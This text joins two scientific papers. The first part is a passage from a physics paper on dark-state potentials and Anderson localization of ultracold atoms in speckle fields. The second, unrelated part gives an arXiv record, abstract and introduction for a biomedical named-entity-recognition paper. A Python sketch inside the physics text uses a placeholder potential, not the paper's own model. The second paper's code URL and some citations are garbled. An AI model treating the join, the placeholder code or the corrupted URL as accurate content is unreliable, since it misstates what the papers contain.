\(\tilde{\Omega}_{1}\) One should note that, in general, there are additional potential peaks near minima of \(\Omega_{2}(x)\) at points designed \(x_{i}^{\prime}\). Such peaks are described by Eq. (31) or Eq. (20) with values of \(\epsilon_{12,i}=\Omega_{1}(x_{i}^{\prime})/\Omega_{2}(x_{i}^{\prime})\) for \(x_{i}^{\prime}\) far from any \(x_{j}\) we have \(\epsilon_{12,i}\gg\) and for \(x_{i}^{\prime}\) equal to some \(x_{j}\) the potential peak is mainly due to zero of \(\Omega_{1}(x)\). These peaks are automatically included in the numerical treatment of the model that takes exact value of \(V_{D}(x)\). One can make similar construction with \(\Omega_{2}(x)\) due to a speckle field, Eq. (15). In contrast to the sine function case, the \(S_{2}\) in Eq. (15) is strictly limited only from below (by zero). The probability for taking the value above \(2\) is nevertheless exponentially suppressed. This means that for most \(\epsilon_{i}\) characterizing individual peaks, we have \(\epsilon_{i}\in[\epsilon_{-},\epsilon_{+}]\) where \(\epsilon_{-}=\max(0,[-2\tilde{\Omega}_{2}+\tilde{\Omega}_{2}^{0}]/\tilde{ \Omega}_{1})\) and \(\epsilon_{+}=[2\tilde{\Omega}_{2}+\tilde{\Omega}_{2}^{0}]/\tilde{\Omega}_{1}\). The resulting potential \(V_{D}(x)\) is shown in Fig. (4c) for \(\epsilon_{+}=0.15\) and \(\epsilon_{-}=0.1\). In broad terms it is similar to the previously considered \(\Omega_{2}(x)\) as in Eq. (9), but differs in statistical properties of peak heights. This is discussed further in Section V where we calculate tight-binding parameters for movement in this kind of random potential. ## IV Localization In the case when \(\Omega_{1}(x)=\text{const.}\) and \(\Omega_{2}(x)=S_{2}(x)\tilde{\Omega}_{2}\) the \(V_{D}(x)\) consists of relatively narrow random double peaks. 
In this setting it is natural to consider Anderson localization, which has traditionally been studied in the optical potential created by a speckle field via the AC-Stark effect. To that end we first discuss the two-point correlation function of the \(V_{D}(x)\) potential in such a case.

### Correlation functions

Let us consider the two-point correlation function \[C_{2}(\delta x)=\overline{V(x)V(x+\delta x)}.\] For random potentials it is directly related to the so-called Anderson localization length \(L_{\text{loc}}\) of the eigenstates [35; 36]. Generically, in one-dimensional systems with a random potential \(V(x)\), \[H = -\frac{\hbar^{2}}{2m}\frac{d^{2}}{dx^{2}}+V(x), \tag{32}\] one expects [3; 36] that eigenstates \(\psi_{i}(x)\) are exponentially localized: \[|\psi_{i}(x)|\ \sim\ \exp[-|x|/L_{\rm loc}(E)]. \tag{33}\] The \(E\) in \(L_{\rm loc}(E)\) is the energy of \(\psi_{i}\). Often \(L_{\rm loc}(E)\) quickly grows with \(E\). The localization length may be related to the correlation function via a series expansion with respect to increasing powers of \((\bar{\Delta}V/\sqrt{E_{\sigma_{R}}(E-\bar{V})})^{1/2}\), where \(\bar{V},\bar{\Delta}V\) are the mean and standard deviation of \(V(x)\). Specifically: \[L_{\rm loc}^{-1}(E-\bar{V})=\sum_{n\geq 2}\gamma^{(n)}(E-\bar{V}). \tag{34}\] The lowest term \(\gamma^{(2)}\) is given by \[\gamma^{(2)}(E-\bar{V})=\frac{m}{4\hbar^{2}(E-\bar{V})}\tilde{C}_{2}\left[2\sqrt{\frac{2m(E-\bar{V})}{\hbar^{2}}}\right]. \tag{35}\] Higher order terms contain multi-point correlation functions, beyond the two-point \(C_{2}\). The expansion holds for a small \(\bar{\Delta}V\). The other cases can be handled by numerical determination of \(L_{\rm loc}^{-1}\). For the speckle optical potential, \(V_{sp}(x)\), with a constant window function \(W=R/2\), the correlation function is: \[C_{2}(\delta x)=\overline{V_{sp}}^{2}\left\{1+\left[\frac{\sin(\delta x/\sigma_{R})}{\delta x/\sigma_{R}}\right]^{2}\right\}, \tag{36}\] and its Fourier transform (see Fig. 5a): \[\tilde{C}_{2}(k)=\overline{V_{sp}}^{2}\left\{2\pi\frac{\delta(k)}{\sigma_{R}}+\pi\max\left(0,1-\frac{|k|\sigma_{R}}{2}\right)\right\}. \tag{37}\] It is important to note that for \(|k|\geq k_{0}=\frac{2}{\sigma_{R}}\) the \(\tilde{C}_{2}(k)\) vanishes [36; 37]. This implies significantly longer localization lengths for energies \(E\) above \(\bar{V}+E_{0},\ E_{0}=\frac{\hbar^{2}k_{0}^{2}}{2m}\), because there the value of \(L_{\rm loc}\) is solely due to higher order terms in the expansion (34). The insertion of the obstacle in the optical system, which amounts to \(W\neq R/2\) in (17), has a profound impact on the correlation function \(\tilde{C}_{2}(k)\). For \(W\leq D/3\) the \(\tilde{C}_{2}(k)\) vanishes not only for \(|k|\geq k_{0}\) but also for some intermediate values of \(|k|\) within the interval \([0,k_{0}]\). This is illustrated for \(W=D/5\) in Fig. 5a). Consider now the dark state potentials \(V_{D}(x)\) as in the preceding section, for the case when \(\Omega_{1}(x)=\tilde{\Omega}_{1}\) and \(\Omega_{2}(x)=\tilde{\Omega}_{2}S_{2}(x)\). For such a configuration the correlation functions \(\tilde{C}_{2}\) and \(C_{2}\) are shown in Fig. 5b) and Fig. 5c), respectively. Contrary to the \(V_{sp}\) potential case, here \(\tilde{C}_{2}(k)\) is non-zero for large values of the momentum \(k\). This corresponds, in position space, to the shape of \(C_{2}\) shown in Fig. 5c), where the dark-state \(C_{2}(x)\) features a narrow peak. These statements hold for both \(W=R/2\) and \(W=R/5\).
In the latter case, when the obstacle is put in front of the diffusive plate, a strong modulation of \(\tilde{C}_{2}(k)\) occurs. Let us track the reason why the high Fourier components of \(\tilde{C}_{2}\) behave differently for \(V_{sp}\) and \(V_{D}(x)\). The speckle potential \(V_{sp}(x)\) is proportional to the square of the Rabi frequency \(\Omega(x)\), as in Eq. (16). Taking the square at most doubles the range of \(k\) that indexes non-zero Fourier components of \(V_{sp}\). This is why \(\tilde{C}_{2}(k)=0\) for \(k\geq k_{0}\). In the case of the dark state potential, the highly nonlinear dependence of \(V_{D}(x)\) on the \(\Omega_{i}(x)\)'s in Eq. (11) produces arbitrarily large Fourier components in \(V_{D}(x)\), and there is no reason for \(\tilde{C}_{2}(k)\) to vanish for large \(k\). This is a manifestation of the origin of the dark state potential in the position-dependent dark state, in contrast to the conventional AC-Stark shift. Another feature worth pointing out is that by changing the ratio \(\tilde{\Omega}_{2}/\tilde{\Omega}_{1}\) one controls the shape of the potential, as demonstrated by the manifestly different \(\tilde{C}_{2}\) for \(\tilde{\Omega}_{2}/\tilde{\Omega}_{1}\) set to the two exemplary values of \(0.1\) and \(0.3\). In the case of the speckle potential, a change of \(\Omega(x)\) changes the constant factor in \(\tilde{C}_{2}(k)\), but keeps the overall shape of \(\tilde{C}_{2}\) from Fig. 5a).

Figure 5: Panel (a) shows \(\tilde{C}_{2}\) for the speckle potential \(V_{sp}\) for \(W=D/2\) (solid line) and \(W=D/5\) (dashed line). Panel (b): same as above for the dark state potential \(V_{D}(x)\) with \(\Omega_{2}(x)=\tilde{\Omega}_{2}S_{2}(x)\) (a speckle field), for \(\tilde{\Omega}_{2}/\tilde{\Omega}_{1}=0.1\) and \(W=D/2\) (solid line), \(W=D/5\) (dashed line). The dashed-dotted line shows data for \(\tilde{\Omega}_{2}/\tilde{\Omega}_{1}=0.3\) and \(W=D/2\). Panel (c) shows the spatial correlation function \(C_{2}(x)\) for all of the above potentials with matching colors. In all of the above, the normalization has been chosen so that the maximal value of each line is \(1\).

### Anderson localization in a dark state potential

To quantitatively analyze the physical implications of a particular form of \(\tilde{C}_{2}\), we simulate the Anderson localization of a particle moving in \(V_{D}\) and \(V_{sp}\). Specifically, we look for eigenstates of Hamiltonian (32) at energy \(E\) such that \(\hbar^{2}k^{2}=2m(E-\bar{V})\). The resulting Schrödinger equation is solved over an interval \(x\in[0,L]\) with the condition \(\psi(x)\to e^{-ikx},\ x\to 0^{+}\). This is the outgoing amplitude of a particle that has entered the sample at \(x=L\). Near \(x=L\) the wavefunction has incoming and reflected components, \(\psi(x\to L)=Ae^{-ikx}+Be^{ikx}\), proportional to \(A\) and \(B\) respectively. The values of \(A\) and \(B\) are determined numerically. We define the localization length \(L_{\rm loc}\) by the condition \[\langle\log|A|\rangle\ \to\ L/L_{\rm loc},\quad L\to\infty, \tag{38}\] where \(\langle\cdot\rangle\) denotes averaging over disorder realizations. Figure 6 shows \(L_{\rm loc}\) for large \(L=5\times 10^{4}\sigma_{R}\) and \(10^{4}\) disorder realizations. Let us focus on the black dashed curve corresponding to \(\sigma_{R}/L_{\rm loc}\) for \(V_{sp}\) with shallow \(\bar{V}_{sp}=\bar{\Delta}V_{sp}=0.04E_{\sigma_{R}}\). Its dependence on \(k\) shows a kink at \(k=k_{0}\) such that \(k_{0}\sigma_{R}=1\). By Eq.
(35) this corresponds to a transition from \(\tilde{C}_{2}\neq 0\) for \(k\leq 2k_{0}\) to \(\tilde{C}_{2}=0\) for \(k\geq 2k_{0}\). The kink is followed by a sudden increase of \(L_{\rm loc}\), as first observed in [36]. We now show \(\sigma_{R}/L_{\rm loc}\) computed numerically for the dark state potential \(V_{D}\). We focus on the case where \(\Omega_{1}(x)=\tilde{\Omega}_{1}\) and \(\Omega_{2}(x)=\tilde{\Omega}_{2}S_{2}(x)\) and present it in the same Fig. 6a). We chose the value \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}\approx 2.357\) to ensure that \(\bar{\Delta}V_{D}=\bar{\Delta}V_{sp}=0.04E_{\sigma_{R}}\). One sees that for low momenta, smaller than the threshold value set by \(k_{0}\), the localization length is similar to that for the speckle potential. At \(k_{0}\) both potentials feature a kink. For such a small potential variance, the main contribution to the inverse localization length comes from \(\gamma^{(2)}(k_{0})\), which is proportional to \(\tilde{C}_{2}(2k_{0})\). For \(k>k_{0}\), \(\tilde{C}_{2}(2k)=0\) for the speckle potential, while for the dark state potential a notable contribution of \(\tilde{C}_{2}\) remains beyond the kink at \(k_{0}\). The main difference comes for \(k\sigma_{R}\geq k_{0}\sigma_{R}\), where the localization is strongly suppressed in the speckle potential but not in the dark state potential \(V_{D}\), again easily explained by the properties of \(\tilde{C}_{2}\). Thus the non-linear dependence of the potential \(V_{D}\) on the \(\Omega\)'s translates directly into an observable, much stronger localization for large particle energies. For a sufficiently large amplitude of the disordered potential, the \(\gamma^{(2)}\) term is no longer the dominant contribution to the inverse localization length. This is evident in Fig. 6a), where \(\bar{\Delta}V_{D}=\bar{\Delta}V_{sp}=0.5E_{\sigma_{R}}\). The kink at \(k_{0}\) can no longer be observed in the dependence of \(\sigma_{R}/L_{\rm loc}\) on \(k\sigma_{R}\) for either \(V_{sp}\) or \(V_{D}\), and the localization length is strongly decreased. Still, for large momenta the localization is much stronger in the non-linear dark state potential. When a non-trivial window function is used, the correlation function \(\tilde{C}_{2}\) for the \(V_{D}\) potential shows oscillations with increasing \(k\sigma_{R}\), as in Fig. 5b). These oscillations find their way into the dependence of \(\sigma_{R}/L_{\rm loc}\) on the free momentum of the wave-function [see Fig. 6b)].

Figure 6: Localization lengths \(L_{\rm loc}\) for the various considered potentials. Panel a) compares the localization length in a speckle potential (dashed lines) and in the \(V_{D}\) potential for the \(\Lambda\) system with \(\Omega_{1}(x)=\tilde{\Omega}_{1},\Omega_{2}(x)=\tilde{\Omega}_{2}S_{2}(x)\). For the speckle field we show two cases, \(\bar{V}=\bar{\Delta}V=0.04E_{\sigma_{R}}\) and \(0.5E_{\sigma_{R}}\), with black dashed and blue dashed lines respectively. The dark state potential \(V_{D}(x)\) for matching \(\bar{\Delta}V\) is shown with the same colors and solid lines; respectively \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}=\epsilon_{12}=2.357\) (black) and \(\epsilon_{12}=0.333\) (blue). Panel b) shows the effect of putting the obstacle in the optical paths. The solid lines show \(\sigma_{R}/L_{\rm loc}\) for \(W=R/2\) (lines repeated from a) to ease the comparison) and the dashed lines for \(W=R/5\). The values \(\epsilon_{12}=2.357\) and \(3.398\) ensure \(\bar{\Delta}V=0.04E_{\sigma_{R}}\) for the \(V_{D}(x)\) potential for \(W=R/2\) and \(W=R/5\) respectively.
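To make the numerical procedure behind Eq. (38) concrete, the following is a minimal Python sketch of the shooting method described above. It assumes units in which \(\hbar^{2}/2m=1\) (so \(E=k^{2}\)); the `placeholder_potential` is a generic correlated-noise stand-in, not the actual construction of \(V_{sp}(x)\) or \(V_{D}(x)\), and the sample length and number of realizations are much smaller than the values quoted in the text.

```python
import numpy as np

# Units: hbar^2 / (2m) = 1, so E = k^2 and psi'' = (V - k^2) psi.

def placeholder_potential(x, rng, sigma_R=1.0, amp=0.04):
    """Generic correlated disorder (stand-in for V_sp or V_D):
    Gaussian noise smoothed over a correlation length ~ sigma_R."""
    dx = x[1] - x[0]
    width = max(1, int(sigma_R / dx))
    kernel = np.exp(-0.5 * (np.arange(-3 * width, 3 * width + 1) / width) ** 2)
    smooth = np.convolve(rng.normal(size=x.size), kernel / kernel.sum(), mode="same")
    return amp * (smooth - smooth.mean()) / smooth.std()

def log_abs_A(k, V, dx):
    """Integrate psi'' = (V - k^2) psi from x = 0 with psi = exp(-ikx) for x <= 0,
    then read off A from psi(L) = A exp(-ikL) + B exp(ikL)."""
    psi_prev = np.exp(1j * k * dx)      # psi(-dx)
    psi = 1.0 + 0.0j                    # psi(0)
    for Vn in V[:-1]:
        psi, psi_prev = 2 * psi - psi_prev + dx**2 * (Vn - k**2) * psi, psi
    L = dx * (len(V) - 1)
    dpsi = (psi - psi_prev) / dx        # crude derivative near x = L
    A = 0.5 * np.exp(1j * k * L) * (psi + 1j * dpsi / k)
    return np.log(np.abs(A))

def inverse_loc_length(k, L=2000.0, dx=0.05, realizations=50, seed=0):
    """<log|A|> -> L / L_loc for large L (Eq. 38), so 1/L_loc is the disorder
    average of log|A| divided by the sample length."""
    rng = np.random.default_rng(seed)
    x = np.arange(0.0, L, dx)
    logs = [log_abs_A(k, placeholder_potential(x, rng), dx) for _ in range(realizations)]
    return np.mean(logs) / L

if __name__ == "__main__":
    for k in (0.5, 1.0, 2.0):
        print(f"k = {k:.1f}, 1/L_loc ~ {inverse_loc_length(k):.2e}")
```

The only physics-specific ingredient is the potential; substituting the actual dark-state or speckle potential for the placeholder reduces the calculation to the averaging step of Eq. (38).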
### Dirac Delta approximation

In this Section we determine whether localization in the dark state potential \(V_{D}\) may be approximately described using a potential consisting of a series of Dirac-delta peaks (a Kronig-Penney-like model), \(V_{\delta,D}(x)\): \[H=\frac{p^{2}}{2m}+\underbrace{\sum_{n}V_{n}\delta(x-x_{n})}_{V_{\delta,D}(x)}. \tag{39}\] Specifically, we compare the Anderson localization length for both \(V_{D}\) and \(V_{\delta,D}\). To choose \(V_{n}\) and \(x_{n}\) for a particular potential realization of \(V_{D}(x)\) and obtain the approximate \(V_{\delta,D}(x)\), we define a sequence of intervals \(I_{n}=(a_{n},b_{n})\subset\mathbb{R}\) such that: (A) \(V(x)\) has at least one local maximum in \(I_{n}\); (B) \(V(a_{n}),V(b_{n})\leq\delta\max_{x\in I_{n}}V(x)\), with \(\delta\) a small positive real number; (C) no sub-interval contained in \(I_{n}\) satisfies the above. Intuitively, we want each interval to contain a large portion of a single potential peak. The small value of \(\delta\) ensures that \(V(x)\) is small outside of each interval \(I_{n}\) with respect to the maximum value. On the other hand, \(\delta\) should not be chosen too small, as that would lead to too large \(I_{n}\) encompassing more than one peak. We opt to choose \(\delta=0.25\). The above definition does not automatically imply that different intervals are disjoint. To ensure that, we actually find the \(I_{n}\) in the following way: 1. For numerics we consider a particular realization over a finite interval \(x\in[0,L]\). 2. We store all local maxima of \(V(x),\;x\in[0,L]\), in decreasing order with respect to their value. 3. We find the interval \(I_{1}\) encompassing the largest maximum that satisfies (A)-(C). 4. After the first \(n\) intervals \(I_{1},\dots,I_{n}\) are determined, (A)-(C) define a candidate for the next interval \(I^{\prime}_{n+1}\). The set \(I_{n+1}:=I^{\prime}_{n+1}\setminus\bigcup_{i=1}^{n}I_{i}\) is an interval. If it is empty then it is not added to the sequence. Each \(I_{n}\) allows us to define an effective peak height \[V_{n}=\int_{I_{n}}V(x)\mathrm{d}x, \tag{40}\] and position \[x_{n}=\frac{1}{V_{n}}\int_{I_{n}}xV(x)\mathrm{d}x. \tag{41}\] Let us note that it is possible that two very close maxima, for which \(V(x)\) does not fall below the threshold defined by \(\delta\), will be approximated by a single Dirac delta.

_Localization length calculation.-_ We have performed the transfer-matrix calculation of \(\sigma_{R}/L_{\mathrm{loc}}\) for the potentials \(V_{\delta,sp}\) and \(V_{\delta,D}\), the Dirac-delta approximations of the potentials \(V_{sp}\) and \(V_{D}\) respectively. We focus on two cases, where the disorder of the potential is \(0.04E_{\sigma_{R}}\) or \(0.5E_{\sigma_{R}}\). When generating the potentials \(V_{\delta,sp}\) and \(V_{\delta,D}\) we assume that it is the variance of the potential being approximated that is equal to one of the above values. For the case of low variance of the potentials, \(0.04E_{\sigma_{R}}\), the inverse localization lengths are shown in Fig. 7a). For small \(k\sigma_{R}\) the inverse localization lengths in all four cases are similar. This is because, for shallow disorder, the series expansion given by (34) holds and \(\sigma_{R}/L_{\mathrm{loc}}\) is determined by the variances of the potentials, which closely match. For \(k\sigma_{R}\) near 1, we observe "kinks" in the dependence of \(\sigma_{R}/L_{\mathrm{loc}}\) on \(k\sigma_{R}\). In the case of the speckle potential this is followed by a sudden drop of \(\sigma_{R}/L_{\mathrm{loc}}\).
This is in stark contrast to the Dirac-delta approximation of the speckle potential \(V_{\delta,sp}\) (and \(V_{\delta,D}\)). This is not surprising, as the speckle potential is smooth and the Fourier transform of its correlation function has finite support. We saw in the previous sections that for dark state potentials the \(\tilde{C}_{2}\) contains arbitrarily high nonzero Fourier components, explaining why \(\sigma_{R}/L_{\text{loc}}\) for \(V_{D}\) and \(V_{\delta,D}\) are closer than for \(V_{sp}\) and \(V_{\delta,sp}\). The agreement of \(\sigma_{R}/L_{\text{loc}}\) between \(V_{\delta,D}\) and \(V_{D}\) may be regarded as at most qualitative for larger \(k\sigma_{R}\). Still, the Dirac-delta approximation of \(V_{D}\) reproduces the fine details of the dependence of \(\sigma_{R}/L_{\text{loc}}\) on \(k\sigma_{R}\), such as the kink at \(k\sigma_{R}=1\). For the deeper disorder, with potential variance of \(0.5E_{\sigma_{R}}\), we see in Fig. 7b) that the \(\sigma_{R}/L_{\text{loc}}\) for \(V_{D}\) and \(V_{\delta,D}\) nearly match. This is because the dark state potential now consists of well-defined narrow peaks, which are well approximated by the discrete Dirac-delta peaks of \(V_{\delta,D}\). The difference shows up only for very high momenta, beginning from \(k\sigma_{R}\approx 3.5\). For both the shallow and the deeper disorder potential, one can reach the conclusion that the Dirac-delta potential \(V_{\delta,D}\) is a valid approximation for the low-energy part of the spectrum of the Hamiltonian of a particle moving in the dark state potential \(V_{D}\) (only qualitatively so for shallow disorder). This is in contrast to localization in a speckle field, which cannot be described by a Kronig-Penney-like model.

## V Tight-binding description of movement in a random comb potential

In this Section we discuss localization in the dark state potential \(V_{D}\) for the configuration presented in Section III.2, with \(\Omega_{1}(x)=\tilde{\Omega}_{1}\sin(k_{1}x)\), \(\Omega_{2}(x)=\tilde{\Omega}_{2}S_{2}(x)+\tilde{\Omega}_{2}^{0}\), when the potential consists of narrow peaks separated by \(a=\pi/k_{1}\). The low-energy dynamics in such a potential is captured by the Dirac-delta approximation \(V_{\delta,D}\), Eq. (39), with \(V_{n}\) given by (40) and \(x_{n}=na\). Localization in such a lattice has been intensively studied before [38]. Following that review, we consider the Schrödinger equation in the following form: \[\left[-\frac{\hbar^{2}}{2m}\frac{d^{2}}{dx^{2}}+\sum_{n=-\infty}^{\infty}E_{r}(\bar{V}+\delta V_{n})\delta(k_{1}x-k_{1}x_{n})\right]\psi(x)=\frac{\hbar^{2}q^{2}}{2m}\psi(x), \tag{42}\] where \(\bar{V}+\delta V_{n}=V_{n}\), \(\langle\delta V_{n}\rangle_{n\in\mathbb{Z}}=0\), \(\sigma^{2}=\langle(\delta V_{n})^{2}\rangle_{n\in\mathbb{Z}}\ll\bar{V}^{2}\). Under the above assumptions the inverse localization length is: \[\frac{a}{L_{\text{loc}}}=\frac{1}{8}\frac{k_{1}^{2}\sin qa}{q^{2}\sin^{2}ka}\sum_{l=-\infty}^{\infty}\langle\delta V_{n}\delta V_{n+l}\rangle_{n\in\mathbb{Z}}\cos(2kal). \tag{43}\] The wavevector \(k\) is obtained from \[\cos(ka)=\cos(qa)+\frac{\bar{V}k_{1}}{2E_{r}q}\sin(qa) \tag{44}\] for those \(q\) that correspond to the band in the case of \(\delta V_{n}=0\). Equation (43) is valid only for those \(q\)'s and cannot be applied in the forbidden bands. There, in the presence of disorder, the density of states is exponentially suppressed [39; 40; 41], but it is non-zero. The localization for those energies can be addressed numerically.
Additionally, the analytic expression is not expected to hold near the bottom and the top of the band. Another limitation follows from the details of the derivation of Eq. (43) (see [38]): the latter does not yield an anomaly in the localization length at the band centre; it predicts a smooth dependence of \(L_{\text{loc}}\).

_Random uncorrelated disorder.-_ We first consider (42) with random, uncorrelated \(\delta V_{n}\). The exact values \(V_{n}=\frac{\pi}{2\epsilon}\) are based on random values of \(\epsilon\) drawn from a uniform distribution in \([0.124,0.126]\) (weak disorder case) and in \([0.1,0.15]\) (strong disorder case). The mean potential heights are \(\bar{V}=12.56\) and \(12.73\), respectively. The intervals of applicability of Eq. (43) are \(q/k_{1}\in[0.9096,1]\) and \(q/k_{1}\in[0.9085,1]\); there, (44) can be solved for the Bloch momentum. In Fig. 8a) we compare the localization length given by Eq. (43) to the numerically determined \(L_{\text{loc}}\) as a function of \(q/k_{1}\), for \(q\) within the regions of validity marked with vertical gray dashed lines [42]. We find quantitatively good agreement between the localization length obtained from Eq. (43) (red lines) and from numerics (black lines). This is true for both the weak disorder (thin lines) and the strong disorder case (thick lines). The discrepancies appear near the band edges, where the analytical expression for the inverse localization length diverges or equals zero. The singularity present in the dependence of \(L_{\text{loc}}\) on \(q/k_{1}\) determined numerically [see inset in Fig. 8a)] is absent in the analytic expression, Eq. (43).

Figure 8: The inverse localization length in Kronig-Penney-like potentials with compositional disorder. Panel (a): random Dirac delta peaks; thick lines: \(\epsilon_{+}=0.15,\epsilon_{-}=0.1\), thin lines: \(\epsilon_{+}=0.126,\epsilon_{-}=0.124\); solid black lines: numerical calculation of \(\sigma_{R}/L_{\text{loc}}\) for sample length \(L=16\cdot 10^{6}/k_{1}\); red dashed lines: the analytical result, Eq. (43). The gray areas denote \(q\)'s outside the applicability interval of this equation. Panel (b): green line: \(\sigma_{R}/L_{\text{loc}}\) for \(\epsilon_{+}=0.15,\epsilon_{-}=0.1\) for \(V_{\delta,D}\), \(\delta=0.0005\); black: random uncorrelated Dirac delta scatterers with \(\epsilon_{+}=0.1444\), \(\epsilon_{-}=0.1087\); red: localization length in the dark state potential \(V_{D}\) for \(\Omega_{1}(x)=\tilde{\Omega}_{1}\sin(k_{1}x),\Omega_{2}(x)=\tilde{\Omega}_{2}S_{2}(x)+\tilde{\Omega}_{2}^{0}\), \(\epsilon_{+}=0.15,\epsilon_{-}=0.1\); the green curve is the \(V_{\delta,D}\) approximation of the \(V_{D}(x)\) shown by the red curve. The \(k_{1}\) is set such that \(k_{1}\sigma_{R}=1\) and \(R/f=1/3\).

_Dark state potential.-_ We now consider the full dark state potential for \(\Omega_{1}(x)=\tilde{\Omega}_{1}\sin(k_{1}x)\), \(\Omega_{2}(x)=\tilde{\Omega}_{2}S_{2}(x)+\tilde{\Omega}_{2}^{0}\). For comparison, we again consider the Hamiltonian of Eq. (42) with \(\delta V_{n}\) based on the \(V_{\delta,D}\) approximation, Eqs. (41) and (40). For the parameters considered in this section the potential \(V_{D}\) consists of isolated, well-defined peaks. This allows us to use \(\delta=0.0005\), much smaller than the \(\delta=0.25\) used in Section IV.3. We focus on the strong disorder case, where for the dark state potential \(\epsilon_{+}=0.15\) and \(\epsilon_{-}=0.1\). The majority of peaks of the dark state potential lie between \(44.4E_{r}\) and \(100E_{r}\).
When the integral (40) is calculated, this gives a \(V_{\delta,D}\) consisting of Dirac deltas with \(\bar{V}=12.51\). We can also find the parameters of the Hamiltonian with uncorrelated \(\delta V_{n}\)'s that has the same \(\bar{V}\); the amplitude of the disorder is matched by requiring that the standard deviation of the \(\delta V_{n}\)'s is the same. Fulfilling those two requirements results in the parameters \(\epsilon_{+}=0.1444\) and \(\epsilon_{-}=0.1087\) for the random \(\delta V_{n}\) case. We now compare the localization length determined numerically for the dark state potential \(V_{D}(x)\) and for its \(V_{\delta,D}\) Dirac-delta approximation. In Fig. 8b) we show \(a/L_{\text{loc}}\) as a function of \(q/k_{1}\) (red and green lines respectively). In both cases the inverse localization length shows a dip for the values of \(\hbar^{2}q^{2}/2m\) that can be traced back to the conduction band in the case of no disorder. The visible difference in the location of this region in \(q/k_{1}\) is due to the finite width of the potential peaks. One can also observe that the singularity near the band centre is very pronounced. It is much larger than in the random uncorrelated disorder case (see black curve in Fig. 8b)). This occurs for both the \(V_{D}(x)\) potential and its Dirac-delta approximation \(V_{\delta,D}(x)\), in contrast to the model with random and uncorrelated \(\delta V_{n}\)'s with \(\bar{V}\) and the standard deviation of \(V_{n}\) matching those of \(V_{\delta,D}(x)\). We find that correlations between the \(V_{n}\)'s in \(V_{\delta,D}\) and in the \(V_{D}(x)\) potential enhance the amplitude of the band-centre anomaly. This is a known possible effect of disorder correlations [43; 38]. Moreover, for the actual dark state potential \(V_{D}(x)\) the localization length \(L_{\text{loc}}\) does not monotonically increase with \(q/k_{1}\): the maximal \(L_{\text{loc}}\) is reached near the band-centre anomaly, not at the top of the band as in \(V_{\delta,D}(x)\).

## VI Conclusions and Outlooks

We have shown the construction of a potential for ultracold atoms using a three-level atomic system. The potential acts on the ultracold atoms populating the dark state. The potentials consist of narrow pseudo-random peaks, with randomness driven by the speckle laser field. We have contrasted the properties of the dark state potential against the off-resonant optical lattice potential given by the speckle field. We have found substantially enhanced localization in the dark state potential, especially for high kinetic energy of the particle. This is explained by a slow decay of the two-point correlation function in Fourier space, a manifestation of the non-linearity of the dark state potential. This is rooted in a different mechanism of generation of the dark state potential than that of the speckle potential, which is due to the far off-resonant AC-Stark process. Our findings indicate that potential generation via a dark state of a three-level system enhances the resolution of the speckle potential and preserves its randomness properties. This can be further extended by replacing the speckle field generating the Rabi frequency \(\Omega_{1}\) with a laser standing wave. It leads to a completely different class of potentials that consist of tall, pseudorandom potential peaks implementing, e.g., a Kronig-Penney model with structural disorder akin to [2; 44]. ###### Acknowledgements. M.L. and J.Z. acknowledge support from the National Science Centre (Poland) through grants No.
2019/35/B/ST2/00838 and 2019/35/B/ST2/00034, respectively. The research has been supported by a grant from the Priority Research Area (DigiWorld) under the Strategic Programme Excellence Initiative at Jagiellonian University. No part of this work was written by artificial intelligence.
2305.13120
Partial Annotation Learning for Biomedical Entity Recognition
Motivation: Named Entity Recognition (NER) is a key task to support biomedical research. In Biomedical Named Entity Recognition (BioNER), obtaining high-quality expert annotated data is laborious and expensive, leading to the development of automatic approaches such as distant supervision. However, manually and automatically generated data often suffer from the unlabeled entity problem, whereby many entity annotations are missing, degrading the performance of full annotation NER models. Results: To address this problem, we systematically study the effectiveness of partial annotation learning methods for biomedical entity recognition over different simulated scenarios of missing entity annotations. Furthermore, we propose a TS-PubMedBERT-Partial-CRF partial annotation learning model. We harmonize 15 biomedical NER corpora encompassing five entity types to serve as a gold standard and compare against two commonly used partial annotation learning models, BiLSTM-Partial-CRF and EER-PubMedBERT, and the state-of-the-art full annotation learning BioNER model PubMedBERT tagger. Results show that partial annotation learning-based methods can effectively learn from biomedical corpora with missing entity annotations. Our proposed model outperforms alternatives and, specifically, the PubMedBERT tagger by 38% in F1-score under high missing entity rates. The recall of entity mentions in our model is also competitive with the upper bound on the fully annotated dataset.
Liangping Ding, Giovanni Colavizza, Zhixiong Zhang
2023-05-22T15:18:38Z
http://arxiv.org/abs/2305.13120v1
# Partial Annotation Learning for Biomedical Entity Recognition ###### Abstract **Motivation:** Named Entity Recognition (NER) is a key task to support biomedical research. In Biomedical Named Entity Recognition (BioNER), obtaining high-quality expert annotated data is laborious and expensive, leading to the development of automatic approaches such as distant supervision. However, manually and automatically generated data often suffer from the _unlabeled entity problem_, whereby many entity annotations are missing, degrading the performance of full annotation NER models. **Results:** To address this problem, we systematically study the effectiveness of partial annotation learning methods for biomedical entity recognition over different simulated scenarios of missing entity annotations. Furthermore, we propose a TS-PubMedBERT-Partial-CRF partial annotation learning model. We harmonize \(15\) biomedical NER corpora encompassing five entity types to serve as a gold standard and compare against two commonly used partial annotation learning models, BiLSTM-Partial-CRF and EER-PubMedBERT, and the state-of-the-art full annotation learning BioNER model PubMedBERT tagger. Results show that partial annotation learning-based methods can effectively learn from biomedical corpora with missing entity annotations. Our proposed model outperforms alternatives and, specifically, the PubMedBERT tagger by 38% in F1-score under high missing entity rates. The recall of entity mentions in our model is also competitive with the upper bound on the fully annotated dataset. **Availability:**[https://ijtee.com/liangping/Ding/partial-annotation-learning](https://ijtee.com/liangping/Ding/partial-annotation-learning) **Contact:** [email protected]; [email protected] **Supplementary information:** Supplementary data are available at _Bioinformatics_ online. ## 1 Introduction Biomedical Named Entity Recognition (BioNER) is a specific sub-task of Named Entity Recognition (NER) that aims to recognize and classify named entities in the biomedical domain. The purpose of BioNER is to automate the process of extracting information from vast amounts of biomedical text, which plays a crucial role in both relation extraction (Colot _et al._, 2005) and knowledge base completion (Saklarczyk _et al._, 2016). By accurately identifying and classifying named entities such as genes, diseases, and drugs, BioNER allows for the discovery of new biological relationships between biomedical entities, supporting advances in the field of biomedicine. For fully annotated NER datasets, this problem has been largely solved by fine-tuning pre-trained language models (Devlin _et al._, 2018; Liu _et al._, 2019). In the biomedical domain, however, due to privacy and ethical concerns (Zhang and Chen, 2022), the lack of fully annotated datasets is still a common issue for BioNER. This limits the size and diversity of available data, since obtaining high-quality annotations at scale is expensive and labor-intensive. To reduce the reliance on expert annotations, distant supervision (Liang 